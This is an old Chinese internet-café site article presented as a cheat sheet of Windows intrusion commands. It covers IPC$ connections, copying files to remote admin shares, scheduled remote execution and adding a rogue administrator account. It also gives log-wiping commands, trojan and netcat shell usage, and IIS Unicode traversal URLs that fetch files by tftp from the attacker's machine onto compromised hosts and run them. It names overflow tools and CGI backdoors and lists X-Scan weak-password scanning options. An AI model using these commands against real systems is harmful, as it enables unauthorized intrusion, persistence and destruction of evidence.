您现在的位置: 天下网吧 >> 网吧焦点 >> 网吧技术 >> 网管 >> 正文

网管和黑客都必须知道的命令

[作者:中国IT实验室收集整… 来源:佚名 时间:2012-11-17我来说两句

  常用的几条NET命令:

  ==================================================

  (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""

  (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"

  (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$

  (查看远程主机时间) net time \\IP地址

  (定时启动某个程序) at \\IP地址 02:18 readme.exe

  (查看共享) net vIEw \\IP地址

  (查看netbios工作组列表) nbtstat -A IP地址

  (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"

  (这两条把自己增加到管理员组): net user 用户名 密码 /add

  net localgroup Administrators 用户名 /add

  (断开连接) net use \\IP地址\ipc$ /delete

  =====================================================

  擦屁屁:

  del C:\winnt\system32\logfiles\*.*

  del C:\winnt\ssytem32\config\*.evt

  del C:\winnt\system32\dtclog\*.*

  del C:\winnt\system32\*.log

  del C:\winnt\system32\*.txt

  del C:\winnt\*.txt

  del C:\winnt\*.log

  ============================

  一、netsvc.exe

  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

  netsvc /list \\IP地址

  netsvc SChedule \\IP地址 /query

  netsvc \\IP地址 SChedule /start

  二、OpenTelnet.exe

  远程启动主机的Telnet服务,并绑定端口到7878,例如:

  OpenTelnet \\IP地址 用户名 密码 1 7878

  然后就可以telnet到主机的7878端口,进入DOS方式下:

  telnet IP地址 7878

  三、winshell.exe

  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:

  p Path (查看winshell主程序的路径信息)

  b reBoot (重新启动机器)

  d shutDown (关闭机器)

  s Shell (执行后你就会看到可爱的“C:\>”)

  x eXit (退出本次登录会话,此命令并不终止winshell的运行)

  CMD> http://……/srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

  四、3389登陆器,GUI方式登录远程主机的

  五、elsave.exe

  事件日志清除工具

  elsave -s \\IP地址 -l "application" -C

  elsave -s \\IP地址 -l "system" -C

  elsave -s \\IP地址 -l "security" -C

  执行后成功清除应用程序日志,系统日志,安全日志

  六、hbulot.exe

  开启win2kserver和winxp的3389服务

  hbulot [/r]

  使用/r表示安装完成后自动重起目标使设置生效。

  七、nc.exe(netcat.exe)

  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

  想要连接到某处: nc [-options] hostname port[s] [ports] ……

  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

  参数:

  -e prog 程序重定向,一旦连接,就执行 [危险!!]

  -g gateway source-routing hop point[s], up to 8

  -G num source-routing pointer: 4, 8, 12, ……

  -h 帮助信息

  -i secs 延时的间隔

  -l 监听模式,用于入站连接

  -n 指定数字的IP地址,不能用hostname

  -o file 记录16进制的传输

  -p port 本地端口号

  -r 任意指定本地及远程端口

  -s addr 本地源地址

  -u UDP模式

  -v 详细输出——用两个-v可得到更详细的内容

  -w secs timeout的时间

  -z 将输入输出关掉——用于扫描时

  八、TFTPD32.EXE

  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

  http://IP地址/s cripts/……%255c……%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

  然后可以直接令文件运行:

  http://IP地址/s cripts/……%255c……%255c/winnt/system32/cmd.exe?/c+文件名

  九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp.

  一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

  一、一 XSCan命令行运行参数说明:

  在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。

  1.命令格式: xSCan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]

  xSCan -file <主机列表文件名> <检测项目> [其他选项]

  其中<检测项目> 含义如下:

  -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);

  -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

  -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

  -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

  -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

  [其他选项] 含义如下:

  -v: 显示详细扫描进度

  -p: 跳过Ping不通的主机

  -o: 跳过没有检测到开放端口的主机

  -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10 1

本文来源:佚名 作者:中国IT实验室收集整…
相关文章
没有相关文章
我来说两句(请遵守法律法规)
 网吧精品   网络布线   热门专题   推荐配置   网络安全   路由专题   网吧游戏更新   网吧QQ关   网吧注册表   网吧新手   网吧优化   网吧无盘优化   网吧系统优化   迅闪2008   网吧三层更新   无盘服务器   MaxDos   Win2008   网吧虚拟磁盘   星际争霸II   锐起无盘   网维大师   网吧游戏菜单   网吧活动   迅闪2009   网吧母盘   万象   网吧真实生活   迅闪2010   信佑2010   Windows8   信佑   迅闪   易游   顺网无盘   连锁网吧   黑网吧   网吧新闻   网吧闲聊   网吧游戏   互联网类软件   增值联盟   网吧广告联盟   有道搜索联盟   淘123联盟   网吧广告   深度无盘   信佑无盘   网众无盘   MZD无盘   网吧软件故障解决   网吧硬件故障大全   海蜘蛛   ROS   磁盘缓存   网吧GHOST   快吧无盘   快吧教程   网吧防盗   2011网吧政策   绿色网吧   网吧禁烟   万象2004   雪花病毒   网吧电影   网吧达人   QQ网吧   SuperCache|SuperSpeed   CCDISK   网吧远程控制   网吧配置   万象密码   迅闪无盘   网吧系统下载   网吧管理系统   网吧键盘   网吧鼠标   WIN8专题   网吧最新新闻   网吧路由   锐起无盘补丁   WayOs   网吧显示器   液晶   万能包   网吧消防   显卡   SSD   网卡   网吧源码   主板   云海   I8无盘   网卡汇聚   网吧DDOS

更多专题

声明
本文来源地址:http://cisco.chinaitlab.com/List_137.html
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系邮箱:support@txwb.com.
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行